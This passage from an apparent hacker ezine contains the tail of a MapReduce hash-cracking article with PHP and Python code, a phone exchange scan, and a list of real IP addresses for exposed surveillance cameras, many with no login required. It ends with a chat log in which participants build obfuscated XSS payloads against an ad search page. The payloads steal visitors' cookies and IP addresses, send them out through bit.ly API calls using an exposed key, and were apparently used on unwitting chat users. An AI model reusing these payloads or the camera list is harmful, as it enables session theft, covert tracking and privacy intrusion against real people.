  |   `time_started` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00',
  |   PRIMARY KEY (`id`)
  | ) ENGINE=MyISAM DEFAULT CHARSET=latin1;
  |

These tables provide the necessary framework for this given implementation, while demonstrating
simple MapReduce structure in an obvious yet functional manner. Should MapReduce be used in a
production environment, a more efficient, scientifically-designed framework should be used.
High-performance applications should, in most cases, not be written in an interpreted language
either.

Obviously, these tables are of no use without the scripts that interact with the database. The
main script that facilitates this interaction is 'stat.php'. It provides the channel through which
the nodes talk to the master: it keeps track of each node's last connect time and assigns each the
job of either 'mapper' or 'reducer'. The code is straightforward, and the source should be
relatively self-explanatory by scanning over it.

So, the next step is to determine the method of relaying data between master and node. The data is
structured in EL markup, which looks suspiciously similar to existing markup languages like HTML
and XML. (The name of the enclosing element did not survive in this copy of the article; it is
written as <packet> below.)

/------------------------------------------------------------------------------------
|<packet>
|    <id>ec366edc8a513f467af89f2e5cd9f37a</id>
|    <type>SET</type>
|    <payload>
|        85103e20ac8441af181b15f58fc53b08
|    </payload>
|</packet>
|

The "id" tag contains the ID of the node. The "type" tag tells the node to perform a specific
action, in this case, to set its "job_id" to the payload. The "payload" tag holds the data that
will be assigned to a variable stored on the node; it is named so that the variable is assigned
correctly. In this particular packet, the information between the opening and closing "payload"
tags is an MD5 hash, though it does not always have to be. However, the protocol defines that the
payload must be alphanumeric only (numbers or letters). If the "type" tag is set to "FILE", then
the payload should be treated as Base64-encoded data. This protocol is simple but allows for easy
parsing and greater flexibility. Note that a node only learns its role and job from what the
master tells it, so a node should validate these fields (alphanumeric id, type and payload; valid
Base64 for FILE) before acting on a packet.

Here is an example handshake performed between node and master. This handshake is initiated by
a node upon startup to seek new jobs:

/---------------------------------------------------------------------------------------------\
|http://127.0.0.1/map_reduce_zine/stat.php?id=ec366edc8a513f467af89f2e5cd9f37a&status=starting|
\---------------------------------------------------------------------------------------------/
                              |
                              |
          /-------------------------------------------------\
          |<packet>                                         |
          |    <id>ec366edc8a513f467af89f2e5cd9f37a</id>    |
          |    <type>REQUEST</type>                         |-----------------------\
          |</packet>                                        |                       |
          \-------------------------------------------------/                       |
                                                                                    |
/--------------------------------------------------------------------------------------------\
|http://127.0.0.1/map_reduce_zine/stat.php?id=ec366edc8a513f467af89f2e5cd9f37a&status=whatami|
\--------------------------------------------------------------------------------------------/
                              |
                              |
          /-------------------------------------------------\
          |<packet>                                         |
          |    <id>ec366edc8a513f467af89f2e5cd9f37a</id>    |
          |    <type>SET</type>                             |
          |    <payload>                                    |
          |        reducer                                  |-----------------------\
          |    </payload>                                   |                       |
          |</packet>                                        |                       |
          \-------------------------------------------------/                       |
                                                                                    |
/--------------------------------------------------------------------------------------------\
|http://127.0.0.1/map_reduce_zine/stat.php?id=ec366edc8a513f467af89f2e5cd9f37a&status=looking|
\--------------------------------------------------------------------------------------------/
                              |
                              |
          /-------------------------------------------------\
          |<packet>                                         |
          |    <id>ec366edc8a513f467af89f2e5cd9f37a</id>    |
          |    <type>SET</type>                             |
          |    <payload>                                    |
          |        85103e20ac8441af181b15f58fc53b08         |
          |    </payload>                                   |
          |</packet>                                        |
          \-------------------------------------------------/

Once the node has received a job, it will send another request to the master for the script and
data files. The job files, which contain the split-up work, are then stored in a folder specific to
that job_id. To retrieve job files from the folder, the following script is used:

/------------------------------------------------------------------------------------
|#job_chunks.php
|# $id (the node's ID) and $job_id come from the request; they are set earlier in the
|# package and are not shown here. $job_id is used unchecked in a filesystem path, so
|# this is one of the places the "not written with security in mind" note below applies.
|$dir = opendir( "./chunks/$job_id" );
|
|if( $dir )
|{
|    # Find the next real file in the directory, skipping "." and "..".
|    do
|    {
|        $thing = readdir( $dir );
|
|        # readdir() returns FALSE when the directory is exhausted: every chunk has
|        # been handed out, so remove the (now empty) job folder.  Compare with ===,
|        # since a chunk named "0" would otherwise be treated as the end of the list.
|        if( $thing === FALSE )
|        {
|            closedir( $dir );
|            rmdir( "./chunks/$job_id" );
|            die;
|        }
|
|        if( $thing == "." || $thing == ".." )
|            continue;
|        else
|            break;
|
|    }while( true );
|
|    if( $thing && $thing != "." && $thing != ".." )
|    {
|        # Wrap the chunk as a FILE packet; the payload is Base64 per the protocol.
|        $output = "<packet>\r\n";
|        $output .= "\t<id>$id</id>\r\n";
|        $output .= "\t<type>FILE</type>\r\n";
|        $output .= "\t<payload>\r\n";
|        $output .= "\t\t".base64_encode( file_get_contents( "./chunks/$job_id/$thing" ) )."\r\n";
|        $output .= "\t</payload>\r\n";
|        $output .= "</packet>";
|        # Read-then-unlink is not atomic: a second node polling at the same moment
|        # can read the same chunk before it is removed (see issue 5 below).
|        unlink( "./chunks/$job_id/$thing" );
|        closedir( $dir );
|        echo $output;
|    }
|}
|

This code grabs the next chunk from the directory and wraps it as an EL packet, and the output is
then sent to the node.

From here, mapper nodes will process this chunk of data and start a small, one-time-use web
server. The reducer nodes request the IP:PORT of a mapper node and grab the result. After doing
so, they further process the data and upload their results to the master.

The master does a final reduction step on the reduced results and produces a final, usable
result that is downloaded by the administrator.

Although very much functional, the implementation that is given with this article possesses a
few inherent issues:

  1) If a node does not complete a job, then that node's results are lost.
  2) There is no redundancy of nodes.
  3) The code as a whole was not written with security in mind. Testing should only be
     performed on a private network.
  4) It uses HTTP to transfer messages, which makes the code easy to write in exchange for
     introducing an enormous amount of overhead.
  5) Speed gains from distributing the cracking process among multiple nodes are negated by
     the fact that nodes request chunks more quickly than other nodes are able to download
     them, resulting in multiple nodes receiving the same chunk. Requesting a chunk is not
     a "blocking" operation. This resulted in a dirty code hack using random sleep times.

With that being said, this project still serves as a good learning tool to those interested in
the MapReduce algorithm.

Download the source package for this article:
  http://www.gonullyourself.org/zine/4/MapReduce.tar.gz
  MD5sum:  d985ffa4b2fcd63d2a6275697acf252e
  SHA1sum: fb798594216e87b51fd194db1a31e580ebe47a7d

A few things need to be done first before testing this code. First, the config.ini files should
be updated to point to the URL of your web server and the folder the MapReduce code is installed in.
The default is "http://127.0.0.1/map_reduce_zine".
Once the configs have been updated correctly, the nodes are ready to run; however, the master must
be set up first. Import and create the tables in map_reduce.sql. To make sure the master runs
without problems, just be lazy and chmod 777 all the directories. For what we're doing, on a
private test box, it really doesn't matter (do not do this on anything reachable from outside,
since the web server then writes to and serves from world-writable directories). Now, all the
configurations are complete.

To test the MapReduce cluster, initialize two or more nodes locally by running the "client.php"
file in each of the "testing" folders. Once they are running, they will begin to poll the master
for work. To add a job to the cluster, navigate to "add_job.php" in your browser. From here, add the
corresponding files from the "example" directory. Once a job is added, the nodes will automatically
grab the work script and any data needed to perform the job. Once the nodes are done with their
work, they will begin to poll for new jobs. The example scripts and data are there to find the
plaintext string "elchupathingy" from the hash in "node_script.php". To see if it worked, browse to
"show_results.php" and select the link there; it will run the "post-process" script and, in this
case, display the plaintext.
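The following is an added example, written for this edit in Python rather than the article's PHP and not part of the MapReduce.tar.gz package. It shows both sides of the EL packet exchange described above (build on the master, parse and validate on the node) and a chunk hand-out that closes issue 5: instead of read-then-unlink, each node claims a chunk by renaming it, which is atomic within a directory on POSIX, so the race that hands the same chunk to two nodes cannot happen. Assumed, because the page does not state them: the root element is written <packet>, and the claim-by-rename scheme and the tempdir-based demo are this example's own, not the package's. The sample chunk files are constructed inside the demo.

```python
import base64
import os
import re
import tempfile
import threading
from xml.etree import ElementTree as ET  # use defusedxml for untrusted input in real code

# Protocol rules taken from the article: id/type and SET payloads are alphanumeric,
# FILE payloads are Base64. The <packet> root name is an assumption (lost in this copy).
ALNUM = re.compile(r"[A-Za-z0-9]+")


def build_packet(node_id, ptype, payload=None):
    """Master side: serialise one EL packet, enforcing the payload rules."""
    if ptype == "FILE":
        body = base64.b64encode(payload).decode("ascii")
    elif payload is not None:
        if not ALNUM.fullmatch(payload):
            raise ValueError("SET payload must be alphanumeric")
        body = payload
    else:
        body = None
    lines = ["<packet>", f"\t<id>{node_id}</id>", f"\t<type>{ptype}</type>"]
    if body is not None:
        lines += ["\t<payload>", f"\t\t{body}", "\t</payload>"]
    lines.append("</packet>")
    return "\r\n".join(lines)


def parse_packet(text):
    """Node side: parse a packet and validate it before acting on it.
    Returns (node_id, type, payload); FILE payloads come back as bytes."""
    root = ET.fromstring(text)
    if root.tag != "packet":
        raise ValueError("unexpected root element")
    node_id = (root.findtext("id") or "").strip()
    ptype = (root.findtext("type") or "").strip()
    raw = (root.findtext("payload") or "").strip()
    if not ALNUM.fullmatch(node_id) or not ALNUM.fullmatch(ptype):
        raise ValueError("id and type must be alphanumeric")
    if ptype == "FILE":
        return node_id, ptype, base64.b64decode(raw, validate=True)
    if raw and not ALNUM.fullmatch(raw):
        raise ValueError("payload must be alphanumeric")
    return node_id, ptype, raw or None


def claim_chunk(job_dir, node_id):
    """Hand out the next chunk exactly once. job_chunks.php reads, serves and then
    unlinks the file, so two nodes polling together can both be served the same
    chunk (issue 5 above). rename() within one directory is atomic on POSIX, so
    only the first caller to rename a chunk gets it; the loser moves on."""
    for name in sorted(os.listdir(job_dir)):
        if name.startswith("."):          # skip chunks already claimed by someone
            continue
        src = os.path.join(job_dir, name)
        claimed = os.path.join(job_dir, f".claimed-{node_id}-{name}")
        try:
            os.rename(src, claimed)
        except FileNotFoundError:         # another node won the race for this one
            continue
        with open(claimed, "rb") as fh:
            data = fh.read()
        os.unlink(claimed)
        return name, build_packet(node_id, "FILE", data)
    return None


def demo(n_nodes=4, n_chunks=6):
    """Constructed input: n_chunks files in a temp dir, n_nodes threads racing for
    them. Returns {chunk name: [(node id, bytes received)]}; with the rename-based
    claim every list has exactly one entry."""
    job_dir = tempfile.mkdtemp(prefix="chunks-")
    for i in range(n_chunks):
        with open(os.path.join(job_dir, f"chunk{i:02d}.txt"), "wb") as fh:
            fh.write(f"hash list part {i}\n".encode())
    got, lock = {}, threading.Lock()

    def node(node_id):
        while (res := claim_chunk(job_dir, node_id)) is not None:
            name, packet = res
            _, ptype, data = parse_packet(packet)   # what the node does on receipt
            with lock:
                got.setdefault(name, []).append((node_id, data))

    threads = [threading.Thread(target=node, args=(f"node{i}",)) for i in range(n_nodes)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    os.rmdir(job_dir)
    return got


if __name__ == "__main__":
    for chunk, receivers in sorted(demo().items()):
        print(chunk, "->", [r[0] for r in receivers])
```

Run it as a script and every chunk is listed against exactly one node. The rename trick is the smallest fix for the duplicate-chunk problem; it does nothing for issue 1 (a node that dies after claiming takes its chunk with it), which needs a lease and re-queue on the master.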
lata,
ELChupathingy

[==================================================================================================]

-=[ 0x09 Camera/DVR Scan
-=[ Author: storm
-=[ Email: storm@gonullyourself.org
-=[ Website: http://gonullyourself.org/

Oh, the joys of nmap.

Open access (no login)
----------------------
http://165.98.238.72/view/index.shtml
http://165.98.238.75/view/index.shtml
http://165.98.238.78/view/index.shtml
http://186.1.14.117/view/index.shtml
http://24.1.5.61:8082/Simple/index.htm
http://24.1.10.154:81/
http://24.1.12.248:1028/
http://24.1.26.48/img/main.cgi?next_file=main.htm
http://72.250.135.252:1024/img/image.cgi?next_file=main_fs.htm
http://74.237.69.5/main.cgi?next_file=main.htm
http://83.227.138.166/main.cgi?next_file=main.htm
http://75.61.194.41:1024/main.cgi?next_file=index_in.htm
http://193.87.102.25/img/main.cgi?next_file=main.htm
http://213.198.245.70/img/main.cgi?next_file=main.htm
http://74.237.69.5/main.cgi?next_file=main2.htm
http://pineairewebcam.dyndns.org/
http://217.159.181.99/
http://193.138.213.166/
http://72.2.138.209:81/
http://ajs01.dyndns.org/
http://62.106.98.204/
http://80.54.239.234/
http://195.47.194.200/
http://78.36.109.5/
http://www.zodiac-bg.com/files/Jview.htm
http://82.107.211.3/
http://84.53.31.54/
http://129.170.124.12/
http://193.178.224.10/
http://chrastal.homeip.net:5050/
http://194.112.215.163/
http://129.70.141.62/
http://209.94.75.172/
http://75.149.126.138:89/
http://67.53.198.178/
http://128.103.101.254/
http://157.157.79.85/
http://208.71.234.122/
http://24.25.42.218:52210/
http://65.182.241.193/
http://216.117.210.183:86/
http://203.213.212.174:1365/
http://142.217.181.117:89/
http://87.243.178.244/
http://81.138.9.30:81/
http://122.3.81.6:82/
http://68.101.243.94:82/
http://80.13.146.246/
http://64.203.239.75/
http://193.251.181.104/
http://213.110.240.157/
http://216.160.181.242:10083/
http://67.242.57.128:86/
http://www.rmackey.com/
http://71.194.73.80:4343/
http://209.117.235.143/
http://71.157.136.110:81/
http://216.129.211.131/
http://217.133.212.61/
http://143.107.3.149/
http://210.230.126.237:82/
http://62.147.232.188/
http://216.137.100.129:81/
http://210.230.133.76:82/
http://222.3.77.52:81/
http://222.11.124.75:81/
http://116.64.17.198/
http://210.249.10.81:81/
http://220.217.129.21:81/
http://210.249.21.157:82/
http://222.1.186.218:81/
http://221.119.133.176:81/
http://213.160.168.72/
http://61.204.127.233:82/
http://222.3.114.56:81/
http://71.110.145.16:89/
http://89.234.195.78/
http://99.135.117.196/
http://65.99.253.134/
http://222.11.60.180:81/
http://61.117.29.119:81/
http://82.176.123.82/
http://66.203.223.50:82/
http://24.20.88.10:84/
http://24.19.205.82:8095/
http://59.133.145.190:82/
http://68.16.245.20/
http://220.214.128.66:82/
http://124.105.235.84/
http://222.5.86.181:82/
http://210.169.100.66:82/
http://222.13.239.47:82/
http://208.54.215.145/
http://66.35.88.6/
http://98.112.171.186:81/
http://59.133.146.58:82/
http://195.131.161.122:85/
http://208.71.217.253:50001/
http://220.217.122.193:81/
http://222.15.48.210:82/
http://220.217.130.205:81/
http://98.190.143.254:23/
http://200.124.240.142:8086/
http://70.154.139.169:83/
http://205.250.69.239:81/
http://124.45.116.105:81/
http://61.204.122.175:82/
http://173.46.175.162:32000/

Login required
--------------
https://24.206.4.253/index.htm
http://24.231.40.38/
http://24.231.41.232/
http://24.231.50.181/
http://24.231.54.90/
http://24.244.132.179/
http://24.244.134.63/
http://24.244.135.87/
http://24.244.135.250/
http://216.137.0.39/auth.html
http://216.137.11.89/
http://24.244.145.66:8080/
http://24.244.145.182/
http://24.244.146.129/
http://24.244.146.192/
http://24.244.180.229/
http://64.150.197.130/
http://64.150.207.20/
http://64.150.210.159/
http://64.150.220.6/
http://64.150.220.67/
http://64.150.222.210/
http://64.150.231.141/
http://64.150.237.8/
https://64.150.238.144/auth.html
http://64.150.245.160/
http://65.75.92.213/
http://65.75.96.59/
http://65.75.107.70/
http://65.75.114.105/
http://65.75.115.236/
http://200.4.168.164/
http://200.80.109.38/
http://186.1.3.18/
http://186.1.3.69/
http://186.1.10.155/
http://190.106.11.19/
http://190.106.11.20/
http://190.106.14.14/
http://190.106.19.67/
http://190.184.94.41/
http://165.98.224.67/
http://165.98.235.2/
http://165.98.236.114/
http://186.1.14.180/
http://186.1.14.181/
http://186.1.14.182/
http://190.106.11.18/
http://190.184.23.39/
http://190.184.35.95/
http://190.184.40.114/
http://190.184.43.97/
http://190.184.45.153/
http://190.184.72.105/
http://190.212.134.190/
http://190.212.134.242/
http://196.200.49.162/
http://24.1.10.135:1050/
http://24.1.13.39:8080/
http://24.1.16.206/
http://186.1.10.156/login.html?1600&1
http://190.106.4.27/

[==================================================================================================]

-=[ 0x0a 303-833-00xx Scan
-=[ Author: Shadytel, Inc
-=[ Website: http://www.shadytel.com/

0001 - Expanded Announcement System (no supe)
0002 - Ringout
0003 - Ringout
0004 - Ringout
0005 - Reorder via SS7?
0006 - Burst of 2200 hz
0007 - Ringout
0008 - Busy signal via distant end
0009 - 102-type milliwatt, hangs up after ~3 cycles
0010 - Same as 0009
0012 - Busy via SS7
0013 - Coin deposit rec
0018 - LD service restricted rec
0020 - Reorder via SS7
0021 - Ringout
0022 - Ringout
0030 - Ringout
0031 - Ringout
0032 - Ringout
0034 - Ringout
0035 - Ringout
0036 - Ringout
0037 - Ringout
0038 - Modem - 7/E/1, *displays TID:, then garbage, then TID too long. Please try again.*
0039 - Something picks up silently after two rings. Faint clicking noise is sometimes audible.
0041 - Ringout
0057 - 105-type test
0058 - Something via SS7? Recheck
0065 - rec, "Remember, you must dial one plus your area code, or zero plus your area code and
       the number for long distance and operator assisted calls."
0066 - Dialing 1/0 not necessary rec
0067 - Dial 1 first rec
0068 - 100-type milliwatt
0069 - Dialing 0 not necessary rec
0070 - YCDNGT
0075 - YCDNGT
0076 - CBCAD/call your operator to help you
0077 - CBCAD/check your instruction manual
0078 - Permanent signal rec
0080 - Low tone
0081 - Same as 0078
0082 - Coin deposit rec
0083 - LD service restricted rec
0084 - CAC error rec
0085 - Tandem CBCAD recording?
0086 - Dialing CAC not necessary rec
0087 - Network difficulties rec
0089 - CAC error rec
0090 - ACB rec
0091 - Busy via SS7
0098 - Reorder via SS7?
0099 - DATU

[==================================================================================================]

-=[ 0x0b bit.ly Shenanigans (aka, XSS is hard bro)
-=[ Author: Silks, elchupathingy
-=[ IRC: irc.gonullyourself.org #gny

Now, while we could neatly explain how we built up our implementation of this trick, it wouldn't
really capture our thought process and just general fucking around. At some point, during the early
hours of the morning, I pondered the idea of grabbing a fellow #gny chatter's IP for the lulz.
Knowing that JavaScript has no reliable function for retrieving a client's IP, the best approach was
to use a standard whatismyip.com site to grab the IP. With the IP address theoretically in my hands,
I approached elchupathingy for ideas of how to export that information without any server-side ties.
After some playing around, we came up with a solution that would gather and store a victim's IP
address in a clever manner, and then redirect them to a final destination as expected.
Here is ourchat log (mildly edited to hide moments of stupidity) which explains how we built this up. -SilksSilks: do you know of a site that is like a persistent xss but not even xss?Silks: will just store info temporarySilks: likeSilks: x.php?q=lolIstolethisguysip:1.1.1.1elchupathingy: could use bit.ly to store itSilks: how soelchupathingy: it stores links you shortenSilks: basically, did you see my XSS, JS+PHP implementation?elchupathingy: don't think soelchupathingy: hmm storing people's info using bit.ly is kind of sly now that i think about itelchupathingy: lolelchupathingy: http://bit.ly/gsfxLpelchupathingy: see what the link expands toSilks: how would you create that though from JS?elchupathingy: one secelchupathingy: "http://api.bitly.com/v3/shorten?login=$bitlylogin&apiKey=$bitlyapi&format=json&longU rl=/search?q=".shit_goes_hereSilks: kelchupathingy: http://api.bitly.com/v3/shorten?login=elchupathingy&apiKey=R_316895177c5be2a28cc9f0b2 52495179&format=json&longUrl=/search?q=lulselchupathingy: just a GET or inclusion should workSilks: I guess if you can see the details in your bit.ly account that will export the infoelchupathingy: http://google.com/search?q=USER:elchupathingy:PASS:lolpasssowrdelchupathingy: thats what it would look likeSilks: I know manSilks: but you are ignoring the actual problemSilks: the point is, getting the data from the victims client to youSilks: so if bit.ly account store recently created urlsSilks: then you can access that bit.ly and extract the infoelchupathingy: yaelchupathingy: woot got the cookie via xss and bit.lyelchupathingy: lolelchupathingy: in a ungodly long xss stringSilks: roflSilks: so likeelchupathingy:
elchupathingy: lolelchupathingy: ungodly longSilks: winSilks: funny thing isSilks: you can then just bit.ly that long urlelchupathingy: exactly lolelchupathingy: and bit.ly will keep track of the people that click on it lolelchupathingy: at the same time of sending you their cookieSilks: guessing the api can retrieve links tooSilks: so you can probably write a quick app to grab it backelchupathingy: yepelchupathingy: well what ya mean?elchupathingy: short url to the info?Silks: wellSilks: say you wanna xss like 100 peopleSilks: everytime someone gets owned they create a new bit.lySilks: so you write an app that connects to bit.ly api and retrieves new bit.ly'sSilks: and from that grabs the redirect url and parses the dataelchupathingy: maybeelchupathingy: have to look over the api real quickSilks: but yeah you can break it down to two commandselchupathingy: can get the countries for each link, statistics on number of clicks and referrrersSilks: bit_xxs_ify
Silks: spits out a bit.ly link that links to the long urlSilks: I guess somehow you'd need to inject what you wantSilks: like "document.cookie"Silks: or just have a menu of all the optionsSilks: bit_xss_ify cookieSilks: bit_xss_ify ipSilks: etcSilks: then you'd needSilks: bitly_to_dataelchupathingy: ok can get the top 100 urlselchupathingy: through their apiSilks: which will grab all your bit.ly urls and push new ones into dbelchupathingy: http://bit.ly/fUGVEOSilks: pro stream musicelchupathingy: click that wanna see if it worksSilks: put it in search boxSilks: didn't exeSilks: https://api-ssl.bitly.com/v3/user/clicks?access_token=BITLY_ASSIGNED_ACCESS_TOKEN&days=7Silks: oh nvmelchupathingy: nah got itelchupathingy: __qca=A0-153091312312-1291239025123263; __utmz=201001501.1201336810.6.6|utmccn=(refer ral)|utmcmd=referral|utmcct=/english/4245268-hf-trance-tiesto-vs-mark-knight-feat-din o-beautiful-world-original-mix.html; TRUID=12957903034531; CKTIME=1301436534; __utma= 251001561.940844074.1295790257.1297648116.1301436811.6Silks: right realtime_linkselchupathingy: lolSilks: what's that?elchupathingy: your clickSilks: lolzSilks: weird how that was referrerSilks: was from a blank tabelchupathingy: yaelchupathingy: but ya works fineSilks: stop stealing mah cookieselchupathingy: nom nom cookiesSilks: ahh it was just cookiesSilks: weird, my cookies show all that info? 
:\elchupathingy: yaSilks: ahh google analytics bselchupathingy: TRUID=13018098525591; CKTIME=1301809854; popunder=yes; popundr=yes; setover18=1Silks: tracking cookieelchupathingy: thats mineSilks: check my latest oneSilks: secelchupathingy: http://bit.ly/hbMGMA much better lolSilks: WHY?elchupathingy: cats are awesomeelchupathingy: lolelchupathingy: u knowelchupathingy: that hurts my feelingsSilks: roflSilks: was trying to tamper data itSilks: but realised that wasn't the actual cookieelchupathingy: oh hahaSilks: so just spammed your linkSilks: lolzelchupathingy: with hte same thing?Silks: pro musicSilks: http://api.bitly.com/v3/shorten?login=elchupathingy&apiKey=R_316895177c5ce2a29cc9f0b252495179 &format=json&longUrl=/search?q=ELCHUPATHINGY_IS_A_NIGGERelchupathingy: doesn't work with the same thing lolSilks: i can change the cookie in tamper dataSilks: butSilks: the js is grabbing document.cookieSilks: and I can't change the urlSilks: maybe in webgoat but cba loading thatelchupathingy: ahelchupathingy: but that hurtselchupathingy: i mean all capsSilks: shutupSilks: you stole my cookieselchupathingy: you clicked the fucking link lolSilks: I trusted you ;(elchupathingy: hahaSilks: bah this is so dumbelchupathingy: lolelchupathingy: hmmelchupathingy: but the bit.ly thing is nice because it guarantees unique cookiesSilks: what do you mean?elchupathingy: it hashes the urlelchupathingy: and my usernameelchupathingy: so if the same person comes to the site the cookie will probably be the same and not be sent againelchupathingy: see if anyone in #gny clicks my link lolSilks: nubSilks: shoulda got it to steal their ipelchupathingy: lolelchupathingy: well too lateSilks: can do it laterelchupathingy: yaelchupathingy: oh thats cool u can modify what the hashes bit.ly goes toelchupathingy: so u could edit the xss as its happening lolelchupathingy: nvm just titleSilks:
Silks: weirdSilks: fucking ssi shitelchupathingy: yaelchupathingy: well nvm not getting anything from the two clicks lolSilks: hmmelchupathingy: but there seems to be confusion over what it isSilks: that xss, can you get it to alert?elchupathingy: ya it's the same one i used to get your cookieelchupathingy: just have a feeling they are using noscriptSilks: where is it executing?elchupathingy: in bodySilks: the results span?elchupathingy:
Results for
Silks: http://ads.clicksor.com/newServing/yesupSearch/web.php?q=%3Cscript%3Edocument.write(document. cookie);%3C/script%3ESilks: ahhSilks: worksSilks: alert doesn'telchupathingy: oh no stringselchupathingy: gets escapedelchupathingy: worksSilks: what I just pasted workselchupathingy: yaSilks: weird that document.alert doesn't workSilks: orSilks: yeah i'm just being dumbelchupathingy: lolSilks: hmmSilks: there is one whatismyip site that returns your ip as text with a specific urlelchupathingy: ya i used thatSilks: linkelchupathingy: secelchupathingy: http://www.whatismyip.com/automation/n09230945.aspSilks: hmmSilks: technically got it workingSilks: but getting owned by access-control-allow-originelchupathingy: getting the ip? or getting it to work as a xss?Silks: printing the ipSilks: once I got it, easymodeSilks: that specific XSS site though doesn't allow for itelchupathingy: ahSilks: hmmSilks: but then, that is odd that yours worksSilks: ahh, something to do with actually accessing the methodSilks: as readystagechange or w/eelchupathingy: im sending the request which is coolSilks: http://ads.clicksor.com/newServing/yesupSearch/web.php?q=%3Cscript%3Evar%20x%20=%20new%20XMLH ttpRequest();x.open(String.fromCharCode(71,69,84),String.fromCharCode(104,116,116,112,58,47,4 7,99,104,101,98,107,105,112,46,99,121,110,100,110,115,46,99,111,109,47));x.onreadystatechange =function(){%20alert(x.status);%20};x.send();%3C/script%3ESilks: SAFESilks: honestlySilks: not a dirty liar like youelchupathingy: lolelchupathingy: 0,0,0,0Silks: ?elchupathingy: alert boxesSilks: yeahSilks: that's with x.statusSilks: should be 200Silks: if you fire up JS console you will see the errorelchupathingy: not getting an errorSilks: browser?elchupathingy: ff4Silks: oh it's fucking chromeelchupathingy: im mean i get a error on the page but its there no matter whatelchupathingy: $(document).pngFixelchupathingy: is not a functionSilks: although it's still not quite rightSilks: still should return 
200elchupathingy: yaSilks: well it is grabbing 200Silks: something up with codeSilks: meh down to this origin bsSilks: http://ads.clicksor.com/newServing/yesupSearch/web.php?q=%3Cscript%3Evar%20x%20=%20new%20XMLH ttpRequest%28%29;x.open%28String.fromCharCode%2871,69,84%29,String.fromCharCode%28104,116,116 ,112,58,47,47,99,104,101,99,106,105,112,46,100,121,110,100,110,115,46,99,111,109,47%29,true%2 9;x.onreadystatechange=function%28%29{if%28x.readyState%20==%204%29%20{%20if%28x.status%20==% 20200%29%20{%20alert%28x.responseText%29;%20}}};x.send%28null%29;%3C/script%3ESilks: code effectively worksSilks: well maybe, on another hostSilks: but if you can host a file elsewhere then you can either chain JS where it does work or use PHP etcelchupathingy: yaelchupathingy: think i got itelchupathingy: one secelchupathingy: Silks: http://ads.clicksor.com/newServing/yesupSearch/web.php?q=%3Cscript%3E;var%20x% 20=%20new%20XMLHttpRequest%28%29;x.open%28String.fromCharCode%2871,69,84%29,String.fr omCharCode%28104,116,116,112,58,47,47,96,111,105,46,104,111,115,116,105,112,46,105,11 0,102,111%29,true%29;x.onreadystatechange%20=function%28%29{if%28x.readyState==4%29{a lert%28x.responseText.match%28new%20RegExp%28String.fromCharCode%2892,100,120,49,44,5 1,125,92,46,92,100,123,49,44,51,125,92,46,92,100,123,49,44,51,125,92,46,92,100,123,49 ,44,51,125%29%29%29%29;}};x.send%28%29;%3C/script%3Eelchupathingy: http://bit.ly/f1Ygcc :DSilks: nice work elchupathingyBarney-: =]Barney-: what happenedSilks: umm, we were messing around with XSSBarney-: rgrSilks: now have XSS code that can steal your IPSilks: well, it grabs the IP, gonna add it to what elchu was working on earlier, storing it in bit.ly linksBarney-: hmmSilks: yeah Barney-, check thisBarney-: ??Silks: http://ads.clicksor.com/newServing/yesupSearch/web.php?q=%3Cscript%3E;var%20x%20=%20new%20XML HttpRequest();x.open(String.fromCharCode(71,69,84),String.fromCharCode(104,116,116,112,58,47, 
47,97,112,105,46,104,111,115,116,105,112,46,105,110,102,111),true);x.onreadystatechange%20=%2 0function(){if(x.readyState==4){alert(x.responseText);}};x.send();%3C/script%3ESilks: this will print the response page of a whatismyip siteBarney-: very coolSilks: I was trying with a different site and it was failingBarney-: thats real cool actuallySilks: elchu tried with that oneSilks: and then used regexSilks: soSilks: http://ads.clicksor.com/newServing/yesupSearch/web.php?q=Silks: also we were discussing how to export info and talked about creating bit.ly links with APIsSilks: found out that it is possible to retrieve newly created links in the API tooSilks: so..Barney-: butBarney-: how do you figure outBarney-: the bit.ly linkBarney-: after its been createdSilks: because of a bit.ly accountSilks: soSilks: http://api.bitly.com/v3/shorten?login=elchupathingy&apiKey=R_316895177c5ce2a29cc9f0b252495179 &format=json&longUrl=/search?q=Silks: will create the urlBarney-: ah ok okBarney-: so you login to the accountSilks: and you can export the data but adding it to q=Barney-: but we don't want IPs we want coookiesSilks: iddSilks: soSilks: if you look at the url aboveSilks: you just doSilks: http://api.bitly.com/v3/shorten?login=elchupathingy&apiKey=R_316895277c5ce2a29cc9f0b252495179 &format=json&longUrl=/search?q= + document.cookieBarney-: ah rgrSilks: specifically that above looks likeSilks: String.fromCharCode(104,116,116,112,58,47,47,97,112,105,46,98,105,116,108,121,46,99,111,109,4 7,118,51,47,115,104,111,114,116,101,110,63,108,111,103,105,110,62,101,108,99,104,117,112,97,1 17,104,105,110,103,121,38,97,112,105,75,101,121,61,82,95,51,49,54,56,57,53,49,55,55,99,53,98, 101,50,97,50,57,99,99,57,102,48,98,50,53,50,52,57,53,49,55,57,38,102,111,114,109,97,116,61,10 6,115,111,110,38,108,111,110,103,85,114,108,61,104,116,116,112,58,47,47,103,111,111,103,108,1 01,46,99,111,109,47,115,101,97,114,99,104,63,113,61).concat(document.cookie));Silks: so since I've woke up and elchu found 
the ip, I'm gonna combine both of them so it will store an IP in a bit.ly accountBarney-: ya but in what type of attack scenario would IP be helpful?Silks: was saying before, obviously we can just store all this info in the same way I did with my XSS session stealer. call a .php and store it in a dbBarney-: dont get me wrong its cool, just wondering applicationBarney-: could do it easierBarney-: and be likeBarney-: hey visit www.silks.com/index.php?id=4 (where id isn't even a var...)Barney-: it'll 404, and show up in access_logBarney-: voilaSilks: hence what I said above but yeahSilks: this is just a way of doing it without any hosting etcBarney-: trueSilks: and pretty interesting to be storing info in bit.ly linksSilks: that page wouldn't 404 if you just added a get varSilks: funny thing is, when you've made the full XSS you can just package it up in a bit.lySilks: elchu posted it in #gny and a couple of people clicked and didn't even understand what happenedSilks: specifically, Compound and jmp got XSS'ed and knew no betterBarney-: hahahBarney-: a bit.ly starts the XSSBarney-: and ends up in a bit.lyBarney-: hence why I don't trust youBarney-: and i go curl -I silks-dumb-links.comSilks: almost doneSilks: gonna own #gnySilks: Barney-Silks: mind testing this?Silks: http://bit.ly/e93lCUSilks: bit.ly/gvZPM8Barney-: Location: http://ads.clicksor.com/newServing/yesupSearch/web.php?q=Barney-: MIME-Version: 1.0Barney-: Content-Length: 1177Barney-: how do you pass a mime-versionBarney-: with no mime typeSilks: probably to do with the bit.ly linkelchupathingy: just woke upSilks: tricked a few people lolzelchupathingy: ya sawelchupathingy: i was happy with the ip lolelchupathingy: but having to add in the random ass semicolons was annoyingSilks: I'm thinking it might be possible to use browser location tracking to grab dataelchupathingy: probablySilks: you know the browser 